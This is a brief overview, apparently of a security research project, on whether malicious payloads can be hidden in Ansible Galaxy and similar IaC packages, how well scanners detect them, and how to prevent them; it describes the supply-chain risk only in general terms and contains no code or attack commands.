Creating, detecting, and preventing malicious Ansible packages
Infrastructure as Code (IaC) uses DevOps methodology and version control with a descriptive model to define and deploy infrastructure, such as networks, virtual machines, load balancers, and connection topologies. IaC has been widely adopted due to its ability to standardize and automate infrastructure provisioning and management, promote collaboration and reproducibility, strengthen governance and auditing, enable rapid adjustments and deployments, and support cost optimization and resource management.
Vendor platforms and package repositories
The implementation of this paradigm was made possible by various vendors, such as Ansible, Chef, and Puppet. Each vendor has its own repository (Ansible Galaxy, Chef Supermarket, and Puppet Forge, respectively) that allows developers to easily find, download, share, and use pre-built instruction sets for specific tasks. For example, deploying an Nginx web server can be achieved by using an Nginx role.
Security concerns with IaC adoption
The widespread adoption of external resources for IaC raised concerns about potential security risks arising from reliance on pre-packaged components without thorough verification. The lack of due diligence in assessing source code leaves systems vulnerable to actors who can inject malicious payloads and gain unauthorized access to an entire infrastructure.
Research objectives
The purpose of this research was to determine whether payloads within IaC packages are fundamentally possible. In addition, available security mechanisms for detecting payloads were evaluated, such as third-party SAST scanners and antivirus scanners.
Detection and prevention methods
Based on these findings, follow-up research was conducted to determine whether payloads are detectable within a range of existing community packages in Ansible Galaxy. Ways to prevent such malicious packages are also discussed.
